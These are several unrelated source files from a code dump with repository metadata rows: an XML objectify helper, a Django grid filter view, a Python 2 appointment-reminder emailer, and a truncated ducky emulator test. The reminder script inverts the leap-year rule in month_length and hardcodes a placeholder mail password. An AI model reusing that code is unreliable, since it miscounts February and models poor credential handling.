software and associated documentation files (the "Software"), to deal in the Software
without restriction, including without limitation the rights to use, copy, modify, merge,
publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies
or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import re
def objectify(node, attributes=None):
"""
Converting XML node into an object instance.
Taking the tag name with first letter as upper case
    as the name for generating a class derived from object
with the node attributes as fields and the values as 'default'.
>>> import xml.etree.ElementTree as ET
>>> document = ET.fromstring('<test-obj int-val="1" str-val="hello" float-val="1.23"/>')
>>> instance = objectify(document, {"object-id": "1234"})
>>> print(instance.__class__.__name__)
TestObj
>>> print(instance.object_id)
1234
>>> print(instance.int_val)
1
>>> print(instance.str_val)
hello
>>> print(instance.float_val)
1.23
:param node: xml node (from lxml.etree or xml.etree)
:param attributes: allows providing fields and default values
which might be overwritten by the XML node attributes.
:returns: instance with node attributes as fields
"""
def convert(attribute_value):
"""
        Convert string to float or int where possible.
        :param attribute_value: string value
        :return: a float or an int when the string matches, otherwise the original string.
"""
if re.match(r"\d+\.\d+", attribute_value):
return float(attribute_value)
if re.match(r"\d+", attribute_value):
return int(attribute_value)
return attribute_value
if None == attributes:
attributes = {}
else:
attributes = (dict([(key.replace("-", "_"), convert(value))
for key, value in attributes.items()]))
attributes.update(dict([(key.replace("-", "_"), convert(value))
for key, value in node.attrib.items()]))
class_name = "".join([entry.title() for entry in node.tag.split("-")])
return type(class_name, (object,), attributes)()
| mit | 4,937,893,628,476,440,000 | 37 | 92 | 0.677235 | false | 4.338377 | false | false | false |
sinnwerkstatt/landmatrix | apps/grid/views/filter.py | 1 | 25004 | from collections import OrderedDict
from datetime import datetime
from bootstrap3_datetime.widgets import DateTimePicker
from django import forms
from django.utils.translation import ugettext as _
from rest_framework.renderers import JSONRenderer
from rest_framework.response import Response
from rest_framework.views import APIView
from apps.api.filters import Filter, PresetFilter
from apps.grid.fields import TitleField, YearMonthDateField
from apps.grid.forms.investor_form import (
OperationalCompanyForm,
ParentInvestorForm,
ParentStakeholderForm,
)
from apps.grid.views.browse_filter_conditions import (
get_activity_field_by_key,
get_investor_field_by_key,
)
from apps.grid.views.utils import DEAL_FORMS
from apps.landmatrix.forms import ActivityFilterForm, InvestorFilterForm
from apps.landmatrix.models import Country, FilterPreset, FilterPresetGroup, Region
class FilterWidgetAjaxView(APIView):
renderer_classes = (JSONRenderer,)
TYPE_STRING = "string"
TYPE_NUMERIC = "numeric"
TYPE_BOOLEAN = "boolean"
TYPE_LIST = "list"
TYPE_AUTOCOMPLETE = "autocomplete"
TYPE_LIST_MULTIPLE = "multiple"
TYPE_DATE = "date"
FIELD_TYPE_MAPPING = OrderedDict(
(
(
YearMonthDateField,
TYPE_DATE,
), # Placed before CharField since it inherits from CharField
(forms.CharField, TYPE_STRING),
(forms.IntegerField, TYPE_NUMERIC),
(forms.BooleanField, TYPE_BOOLEAN),
(forms.ChoiceField, TYPE_LIST),
(forms.MultipleChoiceField, TYPE_LIST_MULTIPLE),
)
)
FIELD_NAME_TYPE_MAPPING = {
"activity_identifier": TYPE_NUMERIC,
"fully_updated": TYPE_DATE,
"fully_updated_date": TYPE_DATE,
"updated_date": TYPE_DATE,
"operational_stakeholder": TYPE_AUTOCOMPLETE,
"target_country": TYPE_AUTOCOMPLETE,
}
TYPE_OPERATION_MAPPING = {
TYPE_STRING: ("contains", "is", "is_empty"),
TYPE_NUMERIC: ("lt", "gt", "gte", "lte", "is", "is_empty"),
TYPE_BOOLEAN: ("is", "is_empty"),
TYPE_LIST: ("is", "not_in", "in", "is_empty"),
TYPE_LIST_MULTIPLE: ("is", "not_in", "in", "is_empty"),
TYPE_DATE: ("lt", "gt", "gte", "lte", "is", "is_empty"),
TYPE_AUTOCOMPLETE: ("is", "not_in", "in", "is_empty"),
}
OPERATION_WIDGET_MAPPING = {"is_empty": None}
TYPE_WIDGET_MAPPING = {
TYPE_STRING: [{"operations": ("contains", "is"), "widget": forms.TextInput}],
TYPE_NUMERIC: [
{
"operations": ("lt", "gt", "gte", "lte", "is"),
"widget": forms.NumberInput,
}
],
TYPE_BOOLEAN: [{"operations": ("is",), "widget": forms.Select}],
TYPE_LIST: [
{"operations": ("is",), "widget": forms.Select},
{"operations": ("not_in", "in"), "widget": forms.CheckboxSelectMultiple},
],
TYPE_LIST_MULTIPLE: [
{"operations": ("is",), "widget": forms.CheckboxSelectMultiple},
{"operations": ("not_in", "in"), "widget": forms.CheckboxSelectMultiple},
],
TYPE_DATE: [
{"operations": ("lt", "gt", "gte", "lte", "is"), "widget": DateTimePicker}
],
TYPE_AUTOCOMPLETE: [
{"operations": ("is",), "widget": forms.Select},
{"operations": ("not_in", "in"), "widget": forms.SelectMultiple},
],
}
FIELD_NAME_MAPPING = {"operational_stakeholder": "operating_company_id"}
field_name = ""
name = ""
operation = ""
doc_type = "deal"
def get(self, request, *args, **kwargs):
"""render form to enter values for the requested field in the filter widget for the grid view
form to select operations is updated by the javascript function update_widget() in /media/js/main.js
"""
self.doc_type = kwargs.get("doc_type", "deal")
self.field_name = self.request.GET.get("key_id", "")
self.name = self.request.GET.get("name", "")
self.operation = self.request.GET.get("operation", "")
return Response(
{
"allowed_operations": self.get_allowed_operations(),
"widget": self.render_widget(),
}
)
@property
def field(self):
if not hasattr(self, "_field"):
if self.field_name:
# Deprecated?
if "inv_" in self.field_name: # pragma: no cover
field = get_activity_field_by_key(self.field_name[4:])
elif self.doc_type == "investor":
field = get_investor_field_by_key(self.field_name)
else:
field = get_activity_field_by_key(self.field_name)
# MultiValueField?
if isinstance(field, forms.MultiValueField):
# Get first field instead
field = field.fields[0]
self._field = field
else:
return None
return self._field
@property
def type(self):
field = self.field
if not hasattr(self, "_type"):
# Get type by field class
for field_class, field_type in self.FIELD_TYPE_MAPPING.items():
if isinstance(field, field_class):
self._type = field_type
break
# Get type by field name
if self.field_name in self.FIELD_NAME_TYPE_MAPPING.keys():
self._type = self.FIELD_NAME_TYPE_MAPPING.get(self.field_name)
# Fallback to string
if not hasattr(self, "_type"):
self._type = self.TYPE_STRING
return self._type
@property
def value(self):
if not hasattr(self, "_value"):
value = self.request.GET.get("value", "")
if value:
# Date?
if self.type == self.TYPE_DATE:
value = datetime.strptime(value, "%Y-%m-%d")
else:
# Boolean?
if self.type == self.TYPE_BOOLEAN:
value = "True"
# Make list
if self.type in (self.TYPE_LIST, self.TYPE_LIST_MULTIPLE):
self._value = value and value.split(",") or []
else:
self._value = value
return self._value
def get_allowed_operations(self):
return self.TYPE_OPERATION_MAPPING[self.type]
def get_attrs(self):
# Merge custom with existing field attributes
attrs = {"id": "id_{}".format(self.name)}
if not self.field or not hasattr(
self.field.widget, "attrs"
): # pragma: no cover
return attrs
if not self.type == self.TYPE_LIST_MULTIPLE and not (
self.type == self.TYPE_LIST and self.operation in ("in", "not_in")
):
attrs["class"] = "valuefield form-control"
field_attrs = self.field.widget.attrs
for key, value in field_attrs.items(): # pragma: no cover
if key in ("readonly",):
continue
if key in attrs and key == "class":
attrs[key] += " %s" % field_attrs[key]
else:
attrs[key] = field_attrs[key]
return attrs
def get_widget_init_kwargs(self):
kwargs = {}
# Get boolean choices (Yes/No)
if self.type == self.TYPE_BOOLEAN:
kwargs["choices"] = [("True", _("Yes")), ("False", _("No"))]
# Get list choices
if self.type in (self.TYPE_LIST, self.TYPE_LIST_MULTIPLE):
kwargs["choices"] = self.field.choices
# Get date options
if self.type == self.TYPE_DATE:
kwargs["options"] = {"format": "YYYY-MM-DD", "inline": True}
return kwargs
def get_widget_render_kwargs(self):
return {"name": self.name, "value": self.value, "attrs": self.get_attrs()}
def get_widget_class(self):
operation_mappings = self.TYPE_WIDGET_MAPPING[self.type]
widget = None
for operation_mapping in operation_mappings:
if self.operation in operation_mapping["operations"]:
widget = operation_mapping["widget"]
return widget
def render_widget(self):
widget = self.get_widget_class()
if widget:
widget = widget(**self.get_widget_init_kwargs())
widget = self._pre_render_widget(widget)
widget = widget.render(**self.get_widget_render_kwargs())
widget = self._post_render_widget(widget)
return widget
def _pre_render_widget(self, widget):
if self.type == self.TYPE_DATE:
# See here: https://github.com/jorgenpt/django-bootstrap3-datetimepicker/commit/042dd1da3a7ff21010c1273c092cba108d95baeb#commitcomment-16877308
widget.js_template = """
<script>
$(function(){$("#%(picker_id)s:has(input:not([readonly],[disabled]))")
.datetimepicker(%(options)s);});
</script>
"""
return widget
def _post_render_widget(self, widget):
return widget
def get_activity_variable_table():
"""
Create an OrderedDict of group name keys with lists of dicts for each
variable in the group (each dict contains 'name' and 'label' keys).
This whole thing is static, and maybe should just be written out, but
    for now generate it dynamically on app load.
"""
# for formsets, we want form.form
deal_forms = [form.form if hasattr(form, "form") else form for form in DEAL_FORMS]
variable_table = OrderedDict()
group_items = []
group_title = ""
# Add Activity attributes
variable_table[str(_("Deal"))] = []
for field_name, field in ActivityFilterForm.base_fields.items():
if field_name == "id": # pragma: no cover
continue
variable_table[str(_("Deal"))].append(
{"name": field_name, "label": str(field.label)}
)
# Add deal attributes
exclude = ("intended_area", "contract_area", "production_area")
for form in deal_forms:
for field_name, field in form.base_fields.items():
if field_name in exclude:
continue
if isinstance(field, TitleField):
if group_title and group_items:
variable_table[group_title] = group_items
group_items = []
group_title = str(field.initial)
else:
group_items.append({"name": field_name, "label": field.label})
if group_title and group_items:
variable_table[group_title] = group_items
# Add operating company attributes
if _("Operating company") not in variable_table: # pragma: no cover
variable_table[str(_("Operating company"))] = []
for field_name, field in OperationalCompanyForm.base_fields.items():
if field_name == "id":
continue
variable_table[str(_("Operating company"))].append(
{
"name": "operating_company_%s" % field_name,
"label": "%s %s" % (str(_("Operating company")), str(field.label)),
}
)
# Add parent company attributes
variable_table[str(_("Parent company"))] = []
for field_name, field in ParentStakeholderForm.base_fields.items():
if field_name == "id":
continue
variable_table[str(_("Parent company"))].append(
{
"name": "parent_stakeholder_%s" % field_name,
"label": "%s %s" % (str(_("Parent company")), str(field.label)),
}
)
# Add tertiary investors/lenders attributes
variable_table[str(_("Tertiary investor/lender"))] = []
for field_name, field in ParentInvestorForm.base_fields.items():
if field_name == "id":
continue
variable_table[str(_("Tertiary investor/lender"))].append(
{
"name": "parent_investor_%s" % field_name,
"label": "%s %s"
% (str(_("Tertiary investor/lender")), str(field.label)),
}
)
return variable_table
def get_investor_variable_table():
"""
Create an OrderedDict of group name keys with lists of dicts for each
variable in the group (each dict contains 'name' and 'label' keys).
This whole thing is static, and maybe should just be written out, but
    for now generate it dynamically on app load.
"""
variable_table = OrderedDict()
group_items = []
group_title = ""
# Add investor attributes
investor_variables = []
for field_name, field in InvestorFilterForm.base_fields.items():
if field_name == "id": # pragma: no cover
continue
investor_variables.append({"name": field_name, "label": str(field.label)})
variable_table[str(_("Investor"))] = investor_variables
# Add parent company attributes
pc_variables = []
for field_name, field in ParentStakeholderForm.base_fields.items():
if field_name == "id":
continue
pc_variables.append(
{
"name": "parent_stakeholder_%s" % field_name,
"label": "%s %s" % (str(_("Parent company")), str(field.label)),
}
)
variable_table[str(_("Parent company"))] = pc_variables
# Add tertiary investors/lenders attributes
til_variables = []
for field_name, field in ParentInvestorForm.base_fields.items():
if field_name == "id":
continue
til_variables.append(
{
"name": "parent_investor_%s" % field_name,
"label": "%s %s"
% (str(_("Tertiary investor/lender")), str(field.label)),
}
)
variable_table[str(_("Tertiary investor/lender"))] = til_variables
return variable_table
class FilterWidgetMixin:
doc_type = "deal"
variable_table = get_activity_variable_table()
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.rules = []
#
# @property
# def filters(self):
# return self.get_filter_context(self.current_formset_conditions)
#
# @property
# def current_formset_conditions(self):
# data = self.request.GET.copy()
# filter_set = self._filter_set(data)
# conditions_formset = self.get_formset_conditions(filter_set, data)
#
# return conditions_formset
def get_context_data(self, **kwargs):
if hasattr(super(), "get_context_data"):
context = super().get_context_data(**kwargs)
else:
context = {}
data = self.request.GET.copy()
self.set_country_region_filter(data)
self.set_default_filters(data)
context.update(
{
# 'filters': self.filters,
# 'empty_form_conditions': self.current_formset_conditions,
# 'rules': self.rules,
"variables": self.variable_table,
"presets": FilterPresetGroup.objects.all(),
"set_default_filters": self.request.session.get(
"%s:set_default_filters" % self.doc_type
),
"status": self.status,
}
)
return context
# def get_filter_context(self, formset_conditions, order_by=None, group_by=None,
# group_value=None, starts_with=None):
# filters = BrowseFilterConditions(formset_conditions, [], 0).parse()
#
# filters['order_by'] = order_by # required for table group view
# filters['group_by'] = group_by
# filters['group_value'] = group_value
#
# filters['starts_with'] = starts_with
#
# return filters
def set_country_region_filter(self, data):
filter_values = {}
# Country or region filter set?
if data.get("country", None) or data.get("region", None):
stored_filters = self.request.session.get("%s:filters" % self.doc_type, {})
if not stored_filters:
stored_filters = {}
if data.get("country", None):
if self.doc_type == "deal":
filter_values["variable"] = "target_country"
filter_values["label"] = _("Target country")
else:
filter_values["variable"] = "fk_country"
filter_values["label"] = _("Country of registration/origin")
filter_values["operator"] = "is"
filter_values["value"] = data.get("country")
try:
country = Country.objects.defer("geom").get(pk=data.get("country"))
filter_values["display_value"] = country.name
except: # pragma: no cover
pass
filter_values["name"] = "country"
data.pop("country")
elif data.get("region", None):
if self.doc_type == "deal":
filter_values["variable"] = "target_region"
filter_values["label"] = str(_("Target region"))
else:
filter_values["variable"] = "region"
filter_values["label"] = str(_("Region of registration/origin"))
filter_values["operator"] = "is"
filter_values["value"] = data.get("region")
try:
region = Region.objects.get(pk=data.get("region"))
filter_values["display_value"] = region.name
except: # pragma: no cover
pass
filter_values["name"] = "region"
data.pop("region")
# Remove existing target country/region filters
filters = filter(
lambda f: f.get("name") in ("country", "region"),
stored_filters.values(),
)
for stored_filter in list(filters):
stored_filters.pop(stored_filter["name"], None)
if filter_values:
# Set filter
new_filter = Filter(
variable=filter_values["variable"],
operator=filter_values["operator"],
value=filter_values["value"],
name=filter_values.get("name", None),
label=filter_values["label"],
display_value=filter_values.get("display_value", None),
)
stored_filters[new_filter.name] = new_filter
self.request.session["%s:filters" % self.doc_type] = stored_filters
else:
self.remove_country_region_filter()
def remove_country_region_filter(self):
stored_filters = self.request.session.get("%s:filters" % self.doc_type, {})
if stored_filters:
stored_filters = dict(
filter(
lambda i: i[1].get("name", "") not in ("country", "region"),
stored_filters.items(),
)
)
self.request.session["%s:filters" % self.doc_type] = stored_filters
# stored_filters = self.request.session['filter_query_params']
# stored_filters = dict(filter(lambda i: i[1].get('variable', '') not in ('target_country', 'target_region'), stored_filters.items()))
self.request.session["%s:filter_query_params" % self.doc_type] = None
def set_default_filters(self, data, disabled_presets=[], enabled_presets=[]):
self.remove_default_filters()
# Don't set default filters? Set them by default (required e.g. for statistics).
if not self.request.session.get(
"%s:set_default_filters" % self.doc_type, False
):
return
if not disabled_presets:
if hasattr(self, "disabled_presets") and self.disabled_presets:
disabled_presets = self.disabled_presets
if not enabled_presets:
if hasattr(self, "enabled_presets") and self.enabled_presets:
enabled_presets = self.enabled_presets
stored_filters = self.request.session.get("%s:filters" % self.doc_type, {})
if not stored_filters:
stored_filters = {}
# Target country or region set?
filter_names = [v.get("name", "") for k, v in stored_filters.items()]
preset_ids = dict(
[(v.get("preset_id", ""), k) for k, v in stored_filters.items()]
)
if "country" in filter_names:
# Use national presets
for preset in FilterPreset.objects.filter(is_default_country=True):
if preset.id in preset_ids.keys(): # pragma: no cover
del stored_filters[preset_ids[preset.id]]
if preset.id in disabled_presets: # pragma: no cover
continue
if preset.id in enabled_presets: # pragma: no cover
del enabled_presets[enabled_presets.index(preset.id)]
filter_name = "default_preset_%i" % preset.id
stored_filters[filter_name] = PresetFilter(
preset, name=filter_name, hidden=preset.is_hidden
)
else:
# Use global presets
for preset in FilterPreset.objects.filter(is_default_global=True):
if preset.id in preset_ids.keys(): # pragma: no cover
del stored_filters[preset_ids[preset.id]]
if preset.id in disabled_presets: # pragma: no cover
continue
filter_name = "default_preset_%i" % preset.id
stored_filters[filter_name] = PresetFilter(
preset, name=filter_name, hidden=preset.is_hidden
)
# Add enabled filters (if not already set)
for preset_id in enabled_presets:
if "default_preset_%i" % preset_id not in stored_filters.keys():
preset = FilterPreset.objects.get(pk=preset_id)
if preset.id in preset_ids.keys(): # pragma: no cover
del stored_filters[preset_ids[preset.id]]
if preset.id in disabled_presets:
continue
filter_name = "default_preset_%i" % preset.id
stored_filters[filter_name] = PresetFilter(
preset, name=filter_name, hidden=preset.is_hidden
)
self.request.session["%s:filters" % self.doc_type] = stored_filters
def remove_default_filters(self):
stored_filters = self.request.session.get("%s:filters" % self.doc_type, {})
if stored_filters:
stored_filters = dict(
filter(lambda i: "default_preset" not in i[0], stored_filters.items())
)
self.request.session["%s:filters" % self.doc_type] = stored_filters
# def get_formset_conditions(self, filter_set, data, group_by=None):
# self.set_country_region_filter(data)
# self.set_default_filters(data)
#
# if filter_set:
# # set given filters
# result = ConditionFormset(data, prefix="conditions_empty")
# else:
# if group_by == "database":
# result = None
# else:
# result = ConditionFormset(self._get_filter_dict(self.rules), prefix="conditions_empty")
# return result
#
# def _filter_set(self, data):
# return data and data.get("filtered") and not data.get("reset", None)
#
# def _get_filter_dict(self, browse_rules):
# filter_dict = MultiValueDict()
# for record, c in enumerate(browse_rules):
# rule_dict = MultiValueDict({
# "conditions_empty-%i-variable" % record: [c.variable],
# "conditions_empty-%i-operator" % record: [c.operator]
# })
# # pass comma separated list as multiple values for operators in/not in
# if c.operator in ("in", "not_in"):
# rule_dict.setlist("conditions_empty-%i-value" % record, c.value.split(","))
# else:
# rule_dict["conditions_empty-%i-value" % record] = c.value
# filter_dict.update(rule_dict)
# filter_dict["conditions_empty-INITIAL_FORMS"] = len(browse_rules)
# filter_dict["conditions_empty-TOTAL_FORMS"] = len(browse_rules)
# filter_dict["conditions_empty-MAX_NUM_FORMS"] = ""
# return filter_dict
@property
def status(self):
if self.request.user.is_authenticated and "status" in self.request.GET:
return self.request.GET.getlist("status")
return [
"2",
"3",
] # FIXME: Use Activity.STATUS_ACTIVE + Activity.STATUS_OVERWRITTEN
| agpl-3.0 | -274,360,651,482,665,100 | 39.459547 | 155 | 0.552352 | false | 4.069661 | false | false | false |
Sodel-the-Vociferous/early-code | camden-office-appt-reminder/send_reminders.py | 1 | 16094 | #!/usr/bin/env python
# ############################## #
# (C)2007 Daniel Ralston #
# Appointment Reminder Software #
# #
# callback.py #
# ############################## #
import shelve
import sys
import calendar
import time
import datetime
import os
import send_mail
import gtk  # assumed available: Error_Handler below builds PyGTK dialog windows
internal = True
class Database:
#Provides a central storage unit to keep track of any and all our data
def __init__(self):
self.appointments = {}
self.clients = {}
self.preferences = {"save at close": True,
"send reminders": True,
"send at login": True,
"company": "",
"email": ""}
self.possible_times = { 1:"7:00",
2:"7:15",
3:"7:30",
4:"7:45",
5:"8:00",
6:"8:15",
7:"8:30",
8:"8:45",
9:"9:00",
10:"9:15",
11:"9:30",
12:"9:45",
13:"10:00",
14:"10:15",
15:"10:30",
16:"10:45",
17:"11:00",
18:"11:15",
19:"11:30",
20:"11:45",
21:"12:00pm",
22:"12:15pm",
23:"12:30pm",
24:"12:45pm",
25:"1:00pm",
26:"1:15pm",
27:"1:30pm",
28:"1:45pm",
29:"2:00pm",
30:"2:15pm",
31:"2:30pm",
32:"2:45pm",
33:"3:00pm",
34:"3:15pm",
35:"3:30pm",
36:"3:45pm",
37:"4:00pm",
38:"4:15pm",
39:"4:30pm",
40:"4:45pm",
41:"5:00pm",
42:"5:15pm",
43:"5:30pm",
44:"5:45pm",
45:"6:00pm",
46:"6:15pm",
47:"6:30pm",
48:"6:45pm",
49:"7:00pm",
50:"7:15pm",
51:"7:30pm",
52:"7:45pm",
53:"8:00pm",
54:"8:15pm",
55:"8:30pm",
56:"8:45pm",
57:"9:00pm"}
self.day_names = {1: "Monday",
2: "Tuesday",
3: "Wednesday",
4: "Thursday",
5: "Friday",
6: "Saturday",
7: "Sunday"}
self.current_user = ""
self.close_program = False
def new_appointment(self, year, month, day, time, length, email, email_bool, client, notes = None, force = False):
# length is the length in minutes divided by 15
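        # e.g. a one-hour appointment is created with length = 60 / 15 = 4 and
        # occupies four consecutive quarter-hour slots from possible_times.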
if client != "":
if force == True:
if (year, month, day, time) in database.appointments:
database.remove_appointment(year, month, day, time)
if (year, month, day, time) not in self.appointments:
i = 1
exists = 0
while i < length:
if (year, month, day, time+i) not in self.appointments:
pass
else:
error_handler.error(None, "Prior Appointment Exists In Specified Time Range")
return 1
i = i + 1
else:
                    self.appointments[(year, month, day, time)] = Appointment(year, month, day, time, length, email, email_bool, client, notes=notes)
i = 1
while (i < length) and (time + i in self.possible_times):
self.appointments[(year, month, day, time + i)] = client
i = i + 1
return 0
else:
error_handler.error(None, "Prior Appointment Exists In Specified Timeslot")
return 1
def remove_appointment(self, year, month, day, time):
#where time is the length of the appointment divided by 15(minutes)
if (year, month, day, time) in self.appointments:
length = self.appointments[(year, month, day, time)].length
del self.appointments[(year, month, day, time)]
i = 1
while (i < length) and (time + i in self.possible_times):
del self.appointments[(year, month, day, time + i)]
i = i + 1
else:
print "yo"
error_handler.error(None, "No Appointment At Specified Timeslot")
return
def new_client(self, name, email, email_bool, notes = None, force = False):
if name not in self.clients:
self.clients[name] = name
self.clients[name] = Client(name, email, email_bool)
else:
if force == False:
error_handler.error(None, "Client Of That Name In Record")
else:
del self.clients[name]
self.new_client(name, email, email_bool, notes)
return
def remove_client(self, widget, name):
appts = self.appointments
if name in self.clients:
del self.clients[name]
for entry in appts:
if self.appointments[entry].client == name:
del self.appointments[entry]
return
def save_data(self, widget = None, user = None):
preferences = shelve.open("preferences")
key_base = shelve.open("key_base")
appointments = shelve.open("appointments")
clients = shelve.open("clients")
for i in key_base:
del key_base[i]
for i in appointments:
del appointments[i]
for i in preferences:
del preferences[i]
for i in self.preferences:
preferences[i] = self.preferences[i]
for i in clients:
del clients[i]
for i in self.clients:
clients[i] = self.clients[i]
iteration = 0
for i in self.appointments:
appointments[str(iteration)] = self.appointments[i]
key_base[str(iteration)] = i
iteration = iteration + 1
appointments.close()
clients.close()
preferences.close()
return
def get_data(self, widget = None, user = None):
preferences = shelve.open("preferences")
appointments = shelve.open("appointments")
key_base = shelve.open("key_base")
clients = shelve.open("clients")
for i in preferences:
self.preferences[i] = preferences[i]
for i in clients:
self.clients[i] = clients[i]
iteration = 0
for i in appointments:
if appointments[str(iteration)] != "":
self.appointments[key_base[str(iteration)]] = appointments[str(iteration)]
iteration = iteration + 1
appointments.close()
clients.close()
preferences.close()
return
class Client:
def __init__(self, name, email, email_bool, notes = None):
self.name = name
self.email = email
self.email_bool = email_bool
notes = []
if notes != None:
for i in notes:
self.notes.append(notes[i]) #Special notes can be added easily
class Appointment:
def __init__(self, year, month, day, time, length, email, email_bool, client, auto_blocked = 0, notes = None):
self.year = year
self.month = month
self.day = day
self.time = time
self.length = length
self.email = email
self.email_bool = email_bool
self.client = client
self.auto_blocked = auto_blocked
self.notes = []
self.sent = False
if notes != None:
for i in notes:
self.notes.append(notes[i])
class Error_Handler:
def error(self, widget = None, message = None, type = "ok", positive = None, negative = None, parameter1 = None, parameter2 = None, size_x = 320, size_y = 200, prev_window = None):
#Error "hub" where the appropraite dialogs are dispatched from.
#"positive" is the appropriate function to call if the type is "yes/no", and the anser is affirmative
#"parameter1" is the "positive" function's parameter
#"negative" and "parameter2"hold the call if the type is "yes/no", and the answer is negative
if prev_window != None:
prev_window.hide_all()
self.error_window = gtk.Window()
self.error_window.set_title('Error')
self.error_window.set_border_width(5)
self.error_window.connect("destroy", self.destroy_error_dialog, prev_window)
self.error_window.set_resizable(False)
error_box = gtk.VBox(False, 10)
error_box.set_size_request(size_x, size_y)
self.error_window.add(error_box)
error_box.add(gtk.Label(message))
if type == "ok":
ok_button = gtk.Button("OK")
ok_button.connect("clicked", self.destroy_error_dialog)
error_box.add(ok_button)
elif type == "yes/no":
prev_window.hide_all()
yes_button = gtk.Button("Okay")
error_box.add(yes_button)
no_button = gtk.Button("Cancel")
error_box.add(no_button)
if positive != None:
yes_button.connect("clicked", self.exec_positive, prev_window, positive, parameter1)
if negative != None:
no_button.connect("clicked", negative, parameter2)
self.error_window.show_all()
def destroy_error_dialog(self, widget = None, prev_window = None):
if prev_window != None:
prev_window.show_all()
self.error_window.destroy()
pass
def exec_positive(self, widget, prev_window, positive, parameter1):
if prev_window != None:
prev_window.show_all()
        self.destroy_error_dialog()
positive(None, parameter1)
class Date:
def __init__(self, year, month, day):
self.year = year
self.month = month
self.day = day
self.time = time
def increment_days(self, days):
if (days >= 0):
target_year = self.year
#print target_year
target_month = self.month
#print target_month
target_day = self.day
#print target_day
month_length = self.month_length(self.month, self.year)
#print month_length, "len"
iterations = 0
while (iterations < days):
if target_day == month_length:
target_day = 1
#print target_day, "day"
target_month = self.increment_month()[0]
#print target_month, "month"
target_year = self.increment_month()[1]
#print target_year, "year"
iterations = iterations + 1
#print iterations, "\n"
else:
target_day = target_day + 1
#print target_day, "Tag"
#print target_month, "month#"
#print target_year, "Jahre"
iterations = iterations + 1
#print iterations, "\n"
return (target_year, target_month, target_day)
else:
error_handler.error("increment_days(self, days): Error, negative input")
def increment_month(self, months = 1):
if months >= 0:
if self.month == 12:
return (1, self.year + 1)
else:
return (self.month + 1, self.year)
else:
error_handler.error("increment_months(self.months): Error, negative input")
def month_length(self, month, year):
if month == 1:
return 31
elif month == 2:
if (year % 4 == 0 and year % 100 != 0) or (year % 400 == 0):
return 28
else:
return 29
elif month == 3:
return 31
elif month == 4:
return 30
elif month == 5:
return 31
elif month == 6:
return 30
elif month == 7:
return 31
elif month == 8:
return 31
elif month == 9:
return 30
elif month == 10:
return 31
elif month == 11:
return 30
elif month == 12:
return 31
class Sender:
def get_today(self):
year, month, day, a, b, c, d, e, f = time.localtime()
return year, month, day
def query(self):
print ("Querying...")
for year, month, day, time in database.appointments:
if str(type(database.appointments[year, month, day, time])) !="<type \'str\'>":
if database.appointments[year, month, day, time].sent == False:
if database.appointments[year, month, day, time].email_bool == True:
company = database.preferences["company"]
sender = database.current_user
sender_email = "[email protected]"
password = "password"
recipient_name = database.appointments[year, month, day, time].client
recipient_email = database.clients[recipient_name].email
for i in database.possible_times:
ntime = database.possible_times[time]
if i == time:
time = i
if send_mail.send_message(company, sender, sender_email, password, recipient_email, recipient_name, year, month, day, ntime) == 0:
database.appointments[year, month, day, time].sent = True
print ("Sent message to "+recipient_name+" for appointment "+str(year)+", "+str(month)+", "+str(day)+str(time))
else:
print ("Error sending message to "+recipient_name+" for appointment "+str(year)+", "+str(month)+", "+str(day)+str(ntime))
if __name__ == "__main__":
yn = ""
print "This program automatically checks for pending e-mail reminders."
print "Do you want to send pending e-mails now?"
yn = str(raw_input("[y/n]>"))
if yn == "y":
error_handler = Error_Handler()
database = Database()
today = Sender().get_today()
database.current_user = "JRandomUser"
os.chdir((str(sys.path[0])+"/databases/"+"JRandomUser"))
database.get_data()
Sender().query()
database.save_data(user = database.current_user)
elif yn == "n":
print "Closing..."
else:
print "Unrecognized Command.\nClosing..." | gpl-2.0 | 6,182,198,387,813,300,000 | 40.375321 | 184 | 0.456568 | false | 4.415364 | false | false | false |
happz/ducky | tests/hdt.py | 1 | 2496 | import ducky.config
import ducky.boot
import ducky.mm
from hypothesis import given
from hypothesis.strategies import integers
from ctypes import sizeof
from . import common_run_machine, LOGGER
from functools import partial
def setup_machine(cpus, cores, memory):
machine_config = ducky.config.MachineConfig()
machine_config.add_section('memory')
machine_config.set('memory', 'size', memory)
M = common_run_machine(machine_config = machine_config, cpus = cpus, cores = cores, post_boot = [lambda _M: False])
return M
@given(cpus = integers(min_value = 0, max_value = 0xF), cores = integers(min_value = 0, max_value = 0xF), memory = integers(min_value = ducky.mm.MINIMAL_SIZE * ducky.mm.PAGE_SIZE, max_value = 0xFFFFFF00))
def test_sanity(cpus, cores, memory):
memory &= ducky.mm.PAGE_MASK
LOGGER.debug('TEST: cpus=%d, cores=%d, memory=0x%08X', cpus, cores, memory)
M = setup_machine(cpus, cores, memory)
assert M.nr_cpus == cpus
assert M.nr_cores == cores
S = M.capture_state()
memory_node = S.get_child('machine').get_child('memory')
hdt_page = ducky.boot.DEFAULT_HDT_ADDRESS // ducky.mm.PAGE_SIZE
hdt_page = [pg_node for pg_node in memory_node.get_page_states() if pg_node.index == hdt_page][0]
def __base_assert(size, page, offset, value):
for i, byte_offset, byte_shift in [(1, 0, 0), (2, 1, 8), (3, 2, 16), (4, 3, 24)]:
expected = (value >> byte_shift) & 0xFF
actual = page.content[offset + byte_offset]
assert expected == actual, 'Byte at offset %d + %d expected 0x%02X, 0x%02X found instead' % (offset, byte_offset, expected, actual)
if i == size:
break
__assert_u16 = partial(__base_assert, 2, hdt_page)
__assert_u32 = partial(__base_assert, 4, hdt_page)
from ducky.mm import u16_t, u32_t
ptr = 0
# HDT header - magic
__assert_u32(ptr, ducky.hdt.HDT_MAGIC); ptr += sizeof(u32_t)
# HDT header - entries count
__assert_u32(ptr, 2); ptr += sizeof(u32_t)
# HDT header - length
__assert_u32(ptr, 28); ptr += sizeof(u32_t)
# Memory
